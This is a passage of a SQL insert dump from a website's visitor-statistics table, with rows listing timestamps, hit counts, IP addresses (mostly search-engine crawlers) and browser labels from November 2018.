9.66.157','chrome'),(325807,1541397561,2,2,0,0,'66.249.66.156','chrome'),(325808,1541397573,1,1,0,0,'54.36.148.62','other'),(325809,1541397733,2,2,0,0,'216.244.66.241','other'),(325810,1541397847,1,1,0,0,'54.36.148.155','other'),(325811,1541397939,4,4,0,0,'40.77.167.209','other'),(325812,1541397944,1,1,0,0,'207.46.13.235','other'),(325813,1541398521,1,1,0,0,'207.46.13.229','other'),(325814,1541398525,4,4,0,0,'207.46.13.252','other'),(325815,1541398665,1,1,0,0,'66.249.66.156','chrome'),(325816,1541398666,1,1,0,0,'66.249.66.152','chrome'),(325817,1541398679,3,3,0,0,'66.249.66.57','chrome'),(325819,1541398700,1,1,0,0,'8.29.198.27','other'),(325820,1541398718,2,2,0,0,'66.249.66.61','chrome'),(325822,1541398731,3,3,0,0,'66.249.66.40','chrome'),(325823,1541398744,1,1,0,0,'54.36.148.213','other'),(325824,1541398796,1,1,0,0,'66.249.66.59','chrome'),(325825,1541398810,1,1,0,0,'66.249.66.44','chrome'),(325826,1541399114,1,1,0,0,'54.36.149.60','other'),(325827,1541399242,1,1,0,0,'66.249.66.157','chrome'),(325828,1541399243,1,1,0,0,'66.249.66.154','chrome'),(325829,1541399352,1,1,0,0,'40.77.167.209','other'),(325830,1541399365,1,1,0,0,'91.196.178.133','chrome'),(325831,1541399774,1,1,0,0,'54.36.149.93','other'),(325832,1541399936,1,1,0,0,'216.244.66.241','other'),(325833,1541400093,4,4,0,0,'66.249.66.57','chrome'),(325835,1541400158,2,2,0,0,'66.249.66.44','chrome'),(325836,1541400171,5,5,0,0,'66.249.66.59','chrome'),(325837,1541400172,5,5,0,0,'66.249.66.40','chrome'),(325838,1541400263,1,1,0,0,'66.249.66.42','chrome'),(325839,1541400342,1,1,0,0,'8.29.198.25','other'),(325840,1541400348,1,1,0,0,'54.36.148.78','other'),(325841,1541400461,1,1,0,0,'128.72.228.159','msie'),(325842,1541400583,1,1,0,0,'8.29.198.26','other'),(325843,1541400656,1,1,0,0,'66.249.66.154','chrome'),(325844,1541401263,1,1,0,0,'54.36.148.216','other'),(325845,1541401383,2,2,0,0,'91.196.177.46','firefox'),(325846,1541401781,2,2,0,0,'216.244.66.241','other'),(325847,1541401794,2,2,0,0,'66.249.66.157','chrome'),(325849,1541401846,1,1,0,0,'66.249.66.44','chrome'),(325850,1541401859,3,3,0,0,'66.249.66.42','chrome'),(325851,1541401872,3,3,0,0,'66.249.66.40','chrome'),(325852,1541401951,1,1,0,0,'66.249.66.154','chrome'),(325853,1541402169,1,1,0,0,'54.36.148.98','other'),(325854,1541402174,1,1,0,0,'54.36.148.18','other'),(325855,1541402393,2,2,0,0,'207.46.13.252','other'),(325856,1541402403,1,1,0,0,'207.46.13.229','other'),(325857,1541402498,1,1,0,0,'54.36.148.247','other'),(325858,1541402694,1,1,0,0,'40.77.167.209','other'),(325859,1541402710,1,1,0,0,'54.36.148.197','other'),(325860,1541402893,1,1,0,0,'66.249.66.155','chrome'),(325862,1541402979,3,3,0,0,'216.244.66.241','other'),(325863,1541403101,1,1,0,0,'66.249.66.57','chrome'),(325864,1541403102,6,6,0,0,'66.249.66.42','chrome'),(325865,1541403234,1,1,0,0,'54.36.148.112','other'),(325866,1541403337,10,10,0,0,'66.249.66.40','chrome'),(325867,1541403547,1,1,0,0,'66.249.66.44','chrome'),(325868,1541403550,1,1,0,0,'82.207.121.233','chrome'),(325869,1541403672,1,1,0,0,'207.46.13.229','other'),(325870,1541403681,2,2,0,0,'207.46.13.235','other'),(325871,1541403717,2,2,0,0,'91.196.178.93','chrome'),(325872,1541403795,1,1,0,0,'54.36.148.192','other'),(325873,1541404386,1,1,0,0,'46.229.168.147','other'),(325874,1541404436,1,1,0,0,'54.36.149.79','other'),(325875,1541404717,1,1,0,0,'141.8.142.144','other'),(325876,1541404740,2,2,0,0,'91.196.178.93','chrome'),(325877,1541404778,1,1,0,0,'37.9.113.148','other'),(325878,1541404844,1,1,0,0,'5.255.253.22','other'),(325879,1541404901,1,1,0,0,'5.45.207.80','other'),(325880,1541404927,1,1,0,0,'87.250.224.47','other'),(325881,1541404940,1,1,0,0,'54.36.149.10','other'),(325882,1541405073,1,1,0,0,'141.8.132.16','other'),(325883,1541405083,1,1,0,0,'66.249.66.157','chrome'),(325884,1541405084,2,2,0,0,'66.249.66.152','chrome'),(325885,1541405097,9,9,0,0,'66.249.66.42','chrome'),(325886,1541405106,1,1,0,0,'54.36.148.58','other'),(325887,1541405135,1,1,0,0,'66.249.66.156','chrome'),(325888,1541405148,10,10,0,0,'66.249.66.40','chrome'),(325889,1541405180,1,1,0,0,'82.207.121.233','chrome'),(325890,1541405226,3,3,0,0,'66.249.66.44','chrome'),(325891,1541405230,1,1,0,0,'5.45.207.76','other'),(325892,1541405233,1,1,0,0,'141.8.142.65','other'),(325893,1541405315,1,1,0,0,'54.36.148.189','other'),(325894,1541406024,1,1,0,0,'54.36.149.64','other'),(325895,1541406087,1,1,0,0,'54.36.149.21','other'),(325896,1541406144,1,1,0,0,'46.164.130.92','chrome'),(325897,1541406380,1,1,0,0,'207.46.13.117','other'),(325898,1541406407,1,1,0,0,'54.36.148.156','other'),(325899,1541406468,1,1,0,0,'54.36.148.173','other'),(325900,1541406585,1,1,0,0,'178.154.200.8','other'),(325901,1541406653,1,1,0,0,'66.249.66.152','chrome'),(325902,1541406850,2,2,0,0,'91.196.178.68','chrome'),(325903,1541406859,1,1,0,0,'54.36.149.11','other'),(325904,1541406952,1,1,0,0,'54.36.148.185','other'),(325905,1541407019,9,9,0,0,'66.249.66.42','chrome'),(325906,1541407045,26,26,0,0,'66.249.66.40','chrome'),(325907,1541407093,2,2,0,0,'95.24.142.97','chrome'),(325908,1541407409,7,7,0,0,'54.190.194.47','chrome'),(325909,1541407451,1,1,0,0,'66.249.66.44','chrome'),(325910,1541407582,1,1,0,0,'54.36.149.1','other'),(325911,1541407640,1,1,0,0,'54.36.149.38','other'),(325912,1541407810,1,1,0,0,'176.118.49.158','chrome'),(325913,1541408092,1,0,1,0,'66.249.66.155',''),(325915,1541408164,1,1,0,0,'54.36.148.168','other'),(325916,1541408166,1,1,0,0,'91.196.178.68','chrome'),(325917,1541408511,2,2,0,0,'216.244.66.241','other'),(325918,1541408690,1,1,0,0,'54.36.148.219','other'),(325919,1541408704,14,14,0,0,'66.249.66.40','chrome'),(325920,1541408714,2,2,0,0,'66.249.66.42','chrome'),(325921,1541408817,1,1,0,0,'91.196.178.136','chrome'),(325922,1541408865,1,1,0,0,'66.249.66.44','chrome'),(325923,1541409012,1,1,0,0,'82.207.121.233','chrome'),(325924,1541409231,1,1,0,0,'46.229.168.130','other'),(325925,1541409234,1,1,0,0,'46.229.168.139','other'),(325926,1541409281,1,1,0,0,'54.36.149.15','other'),(325927,1541409324,4,4,0,0,'91.196.178.93','chrome'),(325928,1541409373,1,1,0,0,'54.36.149.94','other'),(325929,1541409501,1,1,0,0,'54.36.148.100','other'),(325930,1541409530,2,2,0,0,'92.112.124.6','chrome'),(325931,1541409537,1,1,0,0,'46.201.112.157','chrome'),(325932,1541409558,1,1,0,0,'8.29.198.27','other'),(325933,1541409562,1,1,0,0,'66.249.66.152','chrome'),(325934,1541409598,1,1,0,0,'46.211.131.130','chrome'),(325935,1541409991,4,4,0,0,'66.249.66.44','chrome'),(325936,1541409999,25,25,0,0,'66.249.66.40','chrome'),(325937,1541410101,1,1,0,0,'54.36.148.183','other'),(325938,1541410181,1,1,0,0,'54.36.149.64','other'),(325939,1541410237,1,1,0,0,'40.77.167.209','other'),(325940,1541410288,1,1,0,0,'54.36.148.29','other'),(325941,1541411062,1,1,0,0,'82.207.121.233','chrome'),(325942,1541411190,2,2,0,0,'8.29.198.26','other'),(325943,1541411224,2,2,0,0,'66.249.66.42','chrome'),(325944,1541411477,1,1,0,0,'66.249.66.57','chrome'),(325945,1541411484,11,11,0,0,'66.249.66.40','chrome'),(325946,1541411545,1,1,0,0,'66.249.66.59','chrome'),(325947,1541411692,1,1,0,0,'92.112.124.6','chrome'),(325948,1541411980,1,1,0,0,'54.36.148.145','other'),(325949,1541412209,1,1,0,0,'91.196.178.130','firefox'),(325950,1541412275,4,4,0,0,'66.249.66.44','chrome'),(325951,1541412328,1,1,0,0,'54.36.148.51','other'),(325952,1541412379,1,1,0,0,'66.249.66.42','chrome'),(325953,1541412389,11,11,0,0,'66.249.66.40','chrome'),(325954,1541412705,1,1,0,0,'91.196.178.169','chrome'),(325955,1541412851,1,1,0,0,'66.249.66.157','chrome'),(325956,1541412852,1,1,0,0,'66.249.66.156','chrome'),(325957,1541412989,2,2,0,0,'216.244.66.241','other'),(325958,1541413051,1,1,0,0,'54.36.149.45','other'),(325959,1541413125,1,1,0,0,'91.196.178.130','firefox'),(325960,1541413460,1,1,0,0,'54.36.148.211','other'),(325961,1541413821,1,1,0,0,'66.249.66.156','chrome'),(325962,1541413954,2,2,0,0,'95.132.9.175','firefox'),(325963,1541414001,2,2,0,0,'46.219.206.245','chrome'),(325964,1541414072,1,1,0,0,'54.36.148.102','other'),(325965,1541414083,2,2,0,0,'82.207.121.233','chrome'),(325966,1541414282,1,1,0,0,'54.36.148.29','other'),(325967,1541414337,1,1,0,0,'66.249.66.57','chrome'),(325968,1541414338,1,1,0,0,'54.36.148.21','other'),(325969,1541414352,2,2,0,0,'66.249.66.42','chrome'),(325970,1541414691,1,1,0,0,'66.249.66.44','chrome'),(325971,1541414768,1,1,0,0,'54.36.148.91','other'),(325972,1541414775,1,1,0,0,'54.36.149.91','other'),(325973,1541414807,1,1,0,0,'66.249.66.40','chrome'),(325974,1541415013,1,1,0,0,'54.36.148.66','other'),(325975,1541415028,6,6,0,0,'188.166.22.77','msie'),(325976,1541415206,1,1,0,0,'54.36.148.209','other'),(325977,1541415223,1,1,0,0,'95.163.255.93','other'),(325978,1541415226,1,1,0,0,'95.163.255.94','other'),(325979,1541415384,1,1,0,0,'207.46.13.229','other'),(325980,1541415388,1,1,0,0,'207.46.13.252','other'),(325981,1541415766,1,1,0,0,'66.249.66.152','other'),(325982,1541415821,1,1,0,0,'54.36.148.175','other'),(325983,1541416879,1,1,0,0,'46.201.100.12','other'),(325984,1541417239,1,1,0,0,'66.249.66.59','chrome'),(325985,1541417240,2,2,0,0,'66.249.66.40','chrome'),(325986,1541417591,1,1,0,0,'46.229.168.139','other'),(325987,1541417597,4,4,0,0,'216.244.66.241','other'),(325988,1541417989,2,2,0,0,'66.249.66.42','chrome'),(325989,1541418360,1,1,0,0,'54.36.148.134','other'),(325990,1541418951,1,1,0,0,'66.249.66.44','chrome'),(325991,1541418956,1,1,0,0,'66.249.66.42','chrome'),(325992,1541419120,1,1,0,0,'54.36.148.158','other'),(325993,1541419132,1,1,0,0,'54.36.148.220','other'),(325994,1541419226,1,1,0,0,'188.42.35.176','chrome'),(325995,1541419230,1,1,0,0,'66.249.66.40','chrome'),(325996,1541419480,10,10,0,0,'178.154.244.29','other'),(325997,1541419833,1,1,0,0,'207.46.13.117','other'),(325998,1541419950,1,1,0,0,'46.211.125.206','chrome'),(325999,1541420013,1,1,0,0,'54.36.148.73','other'),(326000,1541420036,1,1,0,0,'66.249.66.157','chrome'),(326001,1541420038,1,1,0,0,'66.249.66.154','chrome'),(326002,1541420057,1,1,0,0,'66.249.66.156','chrome'),(326003,1541420059,2,2,0,0,'66.249.66.152','chrome'),(326004,1541420149,2,2,0,0,'40.77.167.209','other'),(326005,1541420271,1,1,0,0,'54.36.148.206','other'),(326006,1541420280,3,3,0,0,'66.249.66.44','chrome'),(326007,1541420410,1,1,0,0,'8.29.198.26','other'),(326008,1541420450,1,1,0,0,'54.36.148.146','other'),(326009,1541420473,2,2,0,0,'178.154.244.29','other'),(326010,1541420477,3,3,0,0,'66.249.66.40','chrome'),(326011,1541420535,3,3,0,0,'66.249.66.42','chrome'),(326012,1541420559,3,3,0,0,'66.249.66.155','chrome'),(326013,1541420574,1,1,0,0,'66.249.66.59','chrome'),(326014,1541420615,1,1,0,0,'178.154.244.11','other'),(326015,1541420799,1,1,0,0,'54.36.149.13','other'),(326016,1541420840,2,2,0,0,'212.129.3.60','chrome'),(326017,1541420879,2,2,0,0,'95.132.9.175','firefox'),(326018,1541420959,1,1,0,0,'54.36.148.88','other'),(326019,1541421033,1,1,0,0,'54.36.148.105','other'),(326020,1541421069,1,1,0,0,'54.36.148.108','other'),(326021,1541421084,1,1,0,0,'54.36.149.0','other'),(326022,1541421108,1,1,0,0,'54.36.148.133','other'),(326023,1541421190,2,2,0,0,'94.178.163.96','chrome'),(326024,1541421209,1,1,0,0,'54.36.148.163','other'),(326025,1541421214,1,1,0,0,'216.244.66.241','other'),(326026,1541421242,1,1,0,0,'54.36.148.118','other'),(326027,1541421243,1,1,0,0,'54.36.149.62','other'),(326028,1541421344,5,5,0,0,'66.249.66.156','chrome'),(326029,1541421345,19,19,0,0,'66.249.66.152','chrome'),(326030,1541421356,1,1,0,0,'54.36.148.128','other'),(326031,1541421371,4,4,0,0,'66.249.66.154','chrome'),(326032,1541421419,1,1,0,0,'207.46.13.229','other'),(326033,1541421423,2,2,0,0,'207.46.13.235','other'),(326034,1541421464,5,5,0,0,'66.249.66.157','chrome'),(326035,1541421479,14,14,0,0,'66.249.66.155','chrome'),(326036,1541421525,1,1,0,0,'54.36.148.123','other'),(326037,1541421577,13,13,0,0,'66.249.66.42','chrome'),(326038,1541421650,56,56,0,0,'66.249.66.40','chrome'),(326039,1541421697,1,1,0,0,'54.36.148.180','other'),(326040,1541421733,1,1,0,0,'54.36.148.26','other'),(326041,1541421904,3,3,0,0,'66.249.66.44','chrome'),(326042,1541422035,1,1,0,0,'8.29.198.25','other'),(326043,1541422041,1,1,0,0,'207.46.13.252','other'),(326044,1541422049,3,3,0,0,'40.77.167.209','other'),(326045,1541422135,2,2,0,0,'91.196.178.93','chrome'),(326046,1541422273,1,1,0,0,'207.46.13.216','other'),(326047,1541422275,1,1,0,0,'8.29.198.27','other'),(326048,1541422345,1,1,0,0,'207.46.13.229','other'),(326049,1541422350,2,2,0,0,'207.46.13.235','other'),(326050,1541422365,1,1,0,0,'91.192.135.241','chrome'),(326051,1541422418,1,1,0,0,'193.106.30.98','firefox'),(326052,1541422485,1,1,0,0,'54.36.148.31','other'),(326053,1541422507,3,3,0,0,'66.249.66.155','chrome'),(326054,1541422525,6,6,0,0,'66.249.66.152','chrome'),(326055,1541422554,1,1,0,0,'46.175.23.29','firefox'),(326056,1541422657,4,4,0,0,'216.244.66.241','other'),(326057,1541422784,1,1,0,0,'54.36.148.172','other'),(326058,1541422903,1,1,0,0,'54.36.149.14','other'),(326059,1541422908,4,4,0,0,'66.249.66.40','chrome'),(326060,1541423055,11,11,0,0,'66.249.66.156','chrome'),(326061,1541423249,2,2,0,0,'66.249.66.157','chrome'),(326062,1541423272,1,1,0,0,'54.36.149.61','other'),(326063,1541423322,1,1,0,0,'54.36.148.188','other'),(326064,1541423389,7,7,0,0,'66.249.66.154','chrome'),(326065,1541423396,9,9,0,0,'66.249.66.42','chrome'),(326066,1541423419,38,38,0,0,'66.249.66.155','chrome'),(326067,1541423434,35,35,0,0,'66.249.66.152','chrome'),(326068,1541423481,1,1,0,0,'207.46.13.235','other'),(326069,1541423789,3,3,0,0,'66.249.66.44','chrome'),(326070,1541423838,8,8,0,0,'66.249.66.40','chrome'),(326071,1541423977,1,1,0,0,'157.55.39.197','other'),(326072,1541424112,1,1,0,0,'66.249.66.57','chrome'),(326073,1541424145,1,1,0,0,'54.36.148.187','other'),(326074,1541424151,1,1,0,0,'178.154.244.11','other'),(326075,1541424239,1,1,0,0,'46.175.23.29','firefox'),(326076,1541424492,1,1,0,0,'40.77.167.209','other'),(326077,1541424507,1,1,0,0,'54.36.148.151','other'),(326078,1541424509,4,4,0,0,'66.249.66.156','chrome'),(326079,1541424510,2,2,0,0,'66.249.66.152','chrome'),(326080,1541424572,1,1,0,0,'212.26.139.182','chrome'),(326081,1541424665,1,1,0,0,'66.249.66.155','chrome'),(326082,1541424667,3,3,0,0,'66.249.66.154','chrome'),(326083,1541424795,3,3,0,0,'207.46.13.229','other'),(326084,1541424800,2,2,0,0,'207.46.13.235','other'),(326085,1541424804,1,1,0,0,'207.46.13.252','other'),(326086,1541425020,1,1,0,0,'216.244.66.241','other'),(326087,1541425041,2,2,0,0,'66.249.66.57','chrome'),(326088,1541425042,1,1,0,0,'66.249.66.40','chrome'),(326089,1541425260,2,2,0,0,'91.196.178.93','chrome'),(326090,1541425465,4,4,0,0,'66.249.66.42','chrome'),(326091,1541425662,2,2,0,0,'52.53.201.78','chrome'),(326092,1541425713,1,1,0,0,'66.249.66.59','chrome'),(326093,1541425790,1,1,0,0,'46.229.168.138','other'),(326094,1541425792,1,1,0,0,'46.229.168.132','other'),(326095,1541425809,5,5,0,0,'66.249.66.157','chrome'),(326096,1541425810,3,3,0,0,'66.249.66.156','chrome'),(326097,1541425932,1,1,0,0,'46.211.74.84','chrome'),(326098,1541425957,1,1,0,0,'54.36.148.28','other'),(326099,1541426053,3,3,0,0,'66.249.66.154','chrome'),(326100,1541426069,1,1,0,0,'54.36.149.78','other'),(326101,1541426175,2,2,0,0,'66.249.66.152','chrome'),(326102,1541426187,1,1,0,0,'66.249.66.155','chrome'),(326103,1541426563,1,1,0,0,'54.36.148.233','other'),(326104,1541426588,1,1,0,0,'216.244.66.241','other'),(326105,1541426684,1,1,0,0,'54.36.148.63','other'),(326106,1541426878,4,4,0,0,'91.196.178.93','chrome'),(326107,1541426955,1,1,0,0,'54.36.149.72','other'),(326108,1541427153,1,1,0,0,'157.55.39.197','other'),(326109,1541427515,1,1,0,0,'54.36.148.57','other'),(326110,1541427637,1,1,0,0,'54.36.149.62','other'),(326111,1541427744,3,3,0,0,'66.249.66.44','chrome'),(326112,1541427792,1,1,0,0,'54.36.148.243','other'),(326113,1541427898,1,1,0,0,'91.196.178.130','chrome'),(326114,1541427900,2,2,0,0,'91.196.178.93','chrome'),(326115,1541427996,1,1,0,0,'54.36.148.136','other'),(326116,1541428119,1,1,0,0,'46.175.23.29','firefox'),(326117,1541428168,1,1,0,0,'66.249.66.152','chrome'),(326118,1541428267,1,1,0,0,'70.37.59.228','firefox'),(326119,1541428314,2,2,0,0,'91.196.178.77','firefox'),(326120,1541428402,1,1,0,0,'54.36.149.95','other'),(326121,1541429207,1,1,0,0,'216.244.66.241','other'),(326122,1541429290,2,2,0,0,'66.249.66.155','chrome'),(326123,1541429300,1,1,0,0,'66.249.66.154','chrome'),(326124,1541429315,1,1,0,0,'66.249.66.152','chrome'),(326125,1541429457,1,1,0,0,'82.207.121.233','chrome'),(326126,1541429670,1,1,0,0,'54.36.148.102','other'),(326127,1541429690,1,1,0,0,'66.249.66.156','chrome'),(326128,1541429749,2,2,0,0,'91.196.178.130','firefox'),(326129,1541429951,1,1,0,0,'91.196.178.93','chrome'),(326130,1541430129,1,1,0,0,'207.46.13.216','other'),(326131,1541430235,1,1,0,0,'54.36.149.92','other'),(326132,1541430328,2,2,0,0,'216.244.66.241','other'),(326133,1541430348,1,1,0,0,'91.196.178.186','chrome'),(326134,1541430663,1,1,0,0,'54.36.148.82','other'),(326135,1541430944,1,1,0,0,'201.76.120.78','chrome'),(326136,1541431044,1,1,0,0,'212.113.45.240','chrome'),(326137,1541431108,2,2,0,0,'54.36.149.61','other'),(326138,1541431255,1,1,0,0,'8.29.198.26','other'),(326139,1541431272,1,1,0,0,'216.244.66.241','other'),(326140,1541431319,2,2,0,0,'207.180.220.114','other'),(326141,1541431377,1,1,0,0,'66.249.66.57','chrome'),(326142,1541431378,1,1,0,0,'66.249.66.40','chrome'),(326143,1541431412,126,126,0,0,'209.94.191.213','other'),(326144,1541431663,1,1,0,0,'54.36.148.135','other'),(326145,1541431667,9,9,0,0,'66.249.66.156','chrome'),(326146,1541431704,5,5,0,0,'66.249.66.155','chrome'),(326147,1541431730,3,3,0,0,'66.249.66.152','chrome'),(326148,1541431786,3,3,0,0,'66.249.66.154','chrome'),(326149,1541431955,1,1,0,0,'67.231.16.205','other'),(326150,1541432328,1,1,0,0,'66.249.66.42','chrome'),(326151,1541432330,1,1,0,0,'54.36.149.42','other'),(326152,1541432528,1,1,0,0,'54.36.148.215','other'),(326153,1541432685,2,2,0,0,'66.249.66.156','chrome'),(326155,1541432778,1,1,0,0,'54.36.148.100','other'),(326156,1541432797,1,1,0,0,'178.154.244.29','other'),(326157,1541432891,1,1,0,0,'8.29.198.25','other'),(326158,1541433078,2,2,0,0,'66.249.66.152','chrome'),(326159,1541433106,3,3,0,0,'216.244.66.241','other'),(326160,1541433140,1,1,0,0,'8.29.198.26','other'),(326161,1541433143,1,1,0,0,'207.46.13.216','other'),(326162,1541433448,1,1,0,0,'178.154.244.11','other'),(326163,1541433463,1,1,0,0,'80.95.44.66','chrome'),(326164,1541433750,6,6,0,0,'66.249.66.155','chrome'),(326165,1541433877,2,2,0,0,'66.249.66.154','chrome'),(326166,1541434030,3,3,0,0,'66.249.66.156','chrome'),(326167,1541434071,3,3,0,0,'66.249.66.152','chrome'),(326168,1541434169,1,1,0,0,'54.36.149.26','other'),(326169,1541434410,1,1,0,0,'54.36.149.24','other'),(326170,1541434439,1,1,0,0,'54.36.148.55','other'),(326171,1541434549,1,1,0,0,'66.249.66.59','chrome'),(326172,1541434556,1,1,0,0,'66.249.66.40','chrome'),(326173,1541435106,1,1,0,0,'54.36.149.47','other'),(326174,1541435120,7,7,0,0,'216.244.66.241','other'),(326175,1541435223,1,1,0,0,'46.229.168.144','other'),(326176,1541435600,1,1,0,0,'54.36.148.84','other'),(326177,1541435756,2,2,0,0,'66.249.66.154','chrome'),(326178,1541435864,1,1,0,0,'46.211.133.226','chrome'),(326179,1541436018,1,1,0,0,'54.36.148.193','other'),(326180,1541436073,4,4,0,0,'66.249.66.156','chrome'),(326181,1541436080,1,1,0,0,'66.249.66.152','chrome'),(326182,1541436125,1,1,0,0,'54.36.148.144','other'),(326183,1541436416,6,6,0,0,'178.154.244.29','other'),(326184,1541436562,3,3,0,0,'178.154.244.11','other'),(326185,1541436702,3,3,0,0,'46.175.23.29','chrome'),(326186,1541436845,1,1,0,0,'54.36.148.204','other'),(326187,1541437074,1,1,0,0,'54.36.148.178','other'),(326188,1541437244,1,1,0,0,'46.211.133.226','chrome'),(326189,1541437346,1,1,0,0,'95.163.255.96','other'),(326190,1541437350,1,1,0,0,'95.163.255.95','other'),(326191,1541437458,3,3,0,0,'178.154.244.29','other'),(326192,1541437498,1,1,0,0,'54.36.149.34','other'),(326193,1541437588,1,1,0,0,'66.249.66.154','chrome'),(326194,1541437662,1,1,0,0,'54.36.149.48','other'),(326195,1541437691,1,1,0,0,'54.36.149.38','other'),(326196,1541437703,1,1,0,0,'93.78.232.42','chrome'),(326197,1541438445,1,1,0,0,'54.36.149.20','other'),(326198,1541438736,2,2,0,0,'66.249.66.44','chrome'),(326199,1541438742,10,10,0,0,'66.249.66.40','chrome'),(326200,1541438829,2,2,0,0,'66.249.66.42','chrome'),(326201,1541438984,2,2,0,0,'216.244.66.241','other'),(326202,1541438999,2,2,0,0,'91.196.178.98','chrome'),(326203,1541439076,1,1,0,0,'54.36.148.72','other'),(326204,1541439180,1,1,0,0,'66.249.66.157','chrome'),(326205,1541439181,1,1,0,0,'66.249.66.154','chrome'),(326206,1541439971,1,1,0,0,'54.36.149.18','other'),(326207,1541440458,1,1,0,0,'54.36.149.53','other'),(326208,1541440570,1,1,0,0,'207.46.13.117','other'),(326209,1541440695,1,1,0,0,'46.229.168.143','other'),(326210,1541440697,1,1,0,0,'46.229.168.132','other'),(326211,1541440828,1,1,0,0,'66.249.66.155','chrome'),(326212,1541440831,1,1,0,0,'66.249.66.152','chrome'),(326213,1541441171,1,1,0,0,'54.36.148.26','other'),(326214,1541441594,1,1,0,0,'54.36.148.163','other'),(326215,1541441858,1,1,0,0,'54.36.148.78','other'),(326216,1541441875,1,1,0,0,'54.36.148.39','other'),(326217,1541442120,1,1,0,0,'8.29.198.27','other'),(326218,1541442745,1,1,0,0,'54.36.149.76','other'),(326219,1541443421,1,1,0,0,'54.36.148.132','other'),(326220,1541443430,1,1,0,0,'54.36.148.94','other'),(326221,1541443539,1,1,0,0,'178.154.244.11','other'),(326222,1541443630,1,1,0,0,'54.36.148.21','other'),(326223,1541443636,1,1,0,0,'54.36.149.46','other'),(326224,1541443675,1,1,0,0,'54.36.149.31','other'),(326225,1541443749,1,1,0,0,'8.29.198.25','other'),(326226,1541443767,1,1,0,0,'54.36.148.75','other'),(326227,1541443850,1,1,0,0,'66.249.66.59','chrome'),(326229,1541443969,3,3,0,0,'216.244.66.241','other'),(326230,1541443991,1,1,0,0,'8.29.198.27','other'),(326231,1541444113,3,1,2,0,'66.249.66.42',''),(326232,1541444257,10,10,0,0,'213.136.75.74','other'),(326233,1541444319,1,1,0,0,'54.36.148.30','other'),(326234,1541444364,1,1,0,0,'66.249.66.44','chrome'),(326235,1541444501,1,1,0,0,'54.36.149.73','other'),(326236,1541444532,1,0,1,0,'66.249.66.156',''),(326237,1541444597,1,1,0,0,'40.77.167.124','other'),(326238,1541444731,1,1,0,0,'54.36.148.228','other'),(326239,1541444761,1,1,0,0,'54.36.149.40','other'),(326240,1541445051,1,1,0,0,'54.36.148.202','other'),(326241,1541445154,1,1,0,0,'54.36.148.204','other'),(326242,1541445173,1,1,0,0,'54.36.148.189','other'),(326243,1541445218,1,1,0,0,'91.196.178.75','chrome'),(326244,1541445365,1,1,0,0,'54.36.148.71','other'),(326245,1541445429,1,1,0,0,'54.36.149.15','other'),(326246,1541445457,1,1,0,0,'178.212.111.36','chrome'),(326247,1541445684,1,1,0,0,'54.36.149.5','other'),(326248,1541446084,1,1,0,0,'66.249.66.155','chrome'),(326249,1541446110,1,1,0,0,'66.249.66.152','chrome'),(326250,1541446272,1,1,0,0,'207.46.13.216','other'),(326251,1541446735,5,5,0,0,'66.249.66.40','chrome'),(326252,1541446778,1,1,0,0,'207.46.13.240','other'),(326253,1541446810,1,1,0,0,'54.36.148.219','other'),(326254,1541446830,1,1,0,0,'80.211.27.105','firefox'),(326255,1541446864,3,3,0,0,'66.249.66.42','chrome'),(326256,1541446937,1,1,0,0,'66.249.66.44','chrome'),(326257,1541447012,1,1,0,0,'54.36.149.38','other'),(326258,1541447147,1,1,0,0,'54.36.149.14','other'),(326259,1541447206,1,1,0,0,'93.74.134.24','chrome'),(326260,1541447542,1,1,0,0,'66.249.66.152','chrome'),(326261,1541447666,6,6,0,0,'66.249.66.40','chrome'),(326262,1541447867,3,3,0,0,'66.249.66.42','chrome'),(326263,1541447905,1,1,0,0,'95.132.24.1','chrome'),(326264,1541448014,1,1,0,0,'54.36.149.18','other'),(326265,1541448080,1,1,0,0,'40.77.167.124','other'),(326266,1541448853,1,1,0,0,'54.36.148.149','other'),(326267,1541448936,1,1,0,0,'54.36.148.100','other'),(326268,1541449206,1,1,0,0,'40.77.167.124','other'),(326269,1541449765,1,1,0,0,'178.140.142.5','msie'),(326270,1541449926,1,1,0,0,'40.77.167.205','other'),(326271,1541450099,1,1,0,0,'54.36.149.82','other'),(326272,1541450860,1,1,0,0,'54.36.149.27','other'),(326273,1541450881,2,2,0,0,'207.46.13.240','other'),(326274,1541450886,1,1,0,0,'207.46.13.252','other'),(326275,1541450891,2,2,0,0,'40.77.167.198','other'),(326276,1541451164,6,6,0,0,'178.154.244.29','other'),(326277,1541451172,1,1,0,0,'54.36.148.203','other'),(326278,1541451184,1,1,0,0,'40.77.167.205','other'),(326279,1541451235,5,5,0,0,'178.154.244.11','other'),(326280,1541451236,1,1,0,0,'54.36.148.22','other'),(326281,1541451714,2,2,0,0,'216.244.66.241','other'),(326282,1541451718,1,1,0,0,'207.46.13.117','other'),(326283,1541451786,3,3,0,0,'66.249.66.44','chrome'),(326284,1541451798,1,1,0,0,'54.36.148.127','other'),(326285,1541451973,1,1,0,0,'54.36.148.178','other'),(326286,1541452003,1,1,0,0,'5.45.207.79','other'),(326287,1541452025,1,1,0,0,'180.76.15.153','other'),(326288,1541452026,1,1,0,0,'180.76.15.8','other'),(326289,1541452096,2,2,0,0,'66.249.66.156','chrome'),(326290,1541452110,1,1,0,0,'40.77.167.124','other'),(326291,1541452125,1,1,0,0,'178.154.244.29','other'),(326292,1541452701,1,1,0,0,'66.249.66.154','chrome'),(326293,1541452820,1,1,0,0,'54.36.148.185','other'),(326294,1541452868,1,1,0,0,'54.36.148.199','other'),(326295,1541452968,1,1,0,0,'54.36.149.78','other'),(326296,1541452972,1,1,0,0,'8.29.198.25','other'),(326297,1541452996,1,1,0,0,'54.36.148.75','other'),(326298,1541453003,1,1,0,0,'54.36.148.191','other'),(326299,1541453063,3,3,0,0,'66.249.66.155','chrome'),(326300,1541453105,1,1,0,0,'54.36.148.57','other'),(326301,1541453186,1,1,0,0,'54.36.148.142','other'),(326302,1541453245,3,3,0,0,'66.249.66.152','chrome'),(326303,1541453250,1,1,0,0,'66.249.66.156','chrome'),(326304,1541453539,1,1,0,0,'54.36.149.5','other'),(326305,1541453654,1,1,0,0,'54.36.148.81','other'),(326306,1541453688,1,1,0,0,'54.36.148.88','other'),(326307,1541453828,1,1,0,0,'40.77.167.205','other'),(326308,1541454117,2,2,0,0,'216.244.66.241','other'),(326309,1541454419,1,1,0,0,'54.36.149.90','other'),(326310,1541454605,2,2,0,0,'8.29.198.27','other'),(326311,1541454667,3,3,0,0,'66.249.66.42','chrome'),(326312,1541454720,1,1,0,0,'207.46.13.252','other'),(326313,1541454724,2,2,0,0,'66.249.66.44','chrome'),(326314,1541454725,1,1,0,0,'40.77.167.198','other'),(326315,1541454729,2,2,0,0,'207.46.13.240','other'),(326316,1541454843,2,2,0,0,'66.249.66.40'